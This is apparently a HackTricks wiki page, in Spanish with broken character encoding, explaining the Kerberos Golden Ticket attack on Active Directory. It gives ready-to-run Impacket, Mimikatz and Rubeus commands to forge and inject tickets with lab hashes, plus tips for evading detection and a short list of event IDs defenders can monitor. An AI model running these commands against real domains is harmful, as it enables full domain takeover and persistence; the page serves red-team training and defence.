Golden Ticket
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Golden ticket
Un ataque de Golden Ticket consiste en la creaci贸n de un Ticket Granting Ticket (TGT) leg铆timo impersonando a cualquier usuario a trav茅s del uso del hash NTLM de la cuenta krbtgt de Active Directory (AD). Esta t茅cnica es particularmente ventajosa porque permite el acceso a cualquier servicio o m谩quina dentro del dominio como el usuario impersonado. Es crucial recordar que las credenciales de la cuenta krbtgt nunca se actualizan autom谩ticamente.
Para adquirir el hash NTLM de la cuenta krbtgt, se pueden emplear varios m茅todos. Puede ser extra铆do del proceso de Local Security Authority Subsystem Service (LSASS) o del archivo NT Directory Services (NTDS.dit) ubicado en cualquier Controlador de Dominio (DC) dentro del dominio. Adem谩s, ejecutar un ataque DCsync es otra estrategia para obtener este hash NTLM, que se puede realizar utilizando herramientas como el m贸dulo lsadump::dcsync en Mimikatz o el script secretsdump.py de Impacket. Es importante subrayar que para llevar a cabo estas operaciones, normalmente se requieren privilegios de administrador de dominio o un nivel de acceso similar.
Aunque el hash NTLM sirve como un m茅todo viable para este prop贸sito, se recomienda encarecidamente forjar tickets utilizando las claves Kerberos de Advanced Encryption Standard (AES) (AES128 y AES256) por razones de seguridad operativa.
python ticketer.py -nthash 25b2076cda3bfd6209161a6c78a69c1c -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park stegosaurus
export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
python psexec.py jurassic.park/stegosaurus@lab-wdc02.jurassic.park -k -no-pass
#mimikatz
kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt
.\Rubeus.exe ptt /ticket:ticket.kirbi
klist #List tickets in memory
# Example using aes key
kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:430b2fdb13cc820d73ecf123dddd4c9d76425d4c2156b89ac551efb9d591a439 /ticket:golden.kirbi
Una vez que tengas el golden Ticket inyectado, puedes acceder a los archivos compartidos (C$) y ejecutar servicios y WMI, por lo que podr铆as usar psexec o wmiexec para obtener un shell (parece que no puedes obtener un shell a trav茅s de winrm).
Eludir detecciones comunes
Las formas m谩s frecuentes de detectar un golden ticket son inspeccionando el tr谩fico de Kerberos en la red. Por defecto, Mimikatz firma el TGT por 10 a帽os, lo que se destacar谩 como an贸malo en las solicitudes TGS posteriores realizadas con 茅l.
Lifetime : 3/11/2021 12:39:57 PM ; 3/9/2031 12:39:57 PM ; 3/9/2031 12:39:57 PM
Utiliza los par谩metros /startoffset
, /endin
y /renewmax
para controlar el desplazamiento de inicio, la duraci贸n y las renovaciones m谩ximas (todo en minutos).
Get-DomainPolicy | select -expand KerberosPolicy
Desafortunadamente, la duraci贸n del TGT no se registra en los 4769, por lo que no encontrar谩s esta informaci贸n en los registros de eventos de Windows. Sin embargo, lo que puedes correlacionar es ver 4769 sin un previo 4768. No es posible solicitar un TGS sin un TGT, y si no hay registro de que se haya emitido un TGT, podemos inferir que fue forjado fuera de l铆nea.
Para eludir esta detecci贸n, revisa los diamond tickets:
Mitigaci贸n
- 4624: Inicio de sesi贸n de cuenta
- 4672: Inicio de sesi贸n de administrador
Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List 鈥揚roperty
Otros peque帽os trucos que los defensores pueden hacer es alertar sobre 4769 para usuarios sensibles como la cuenta de administrador de dominio predeterminada.
Referencias
- https://www.tarlogic.com/blog/how-to-attack-kerberos/
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets] (https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets)
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.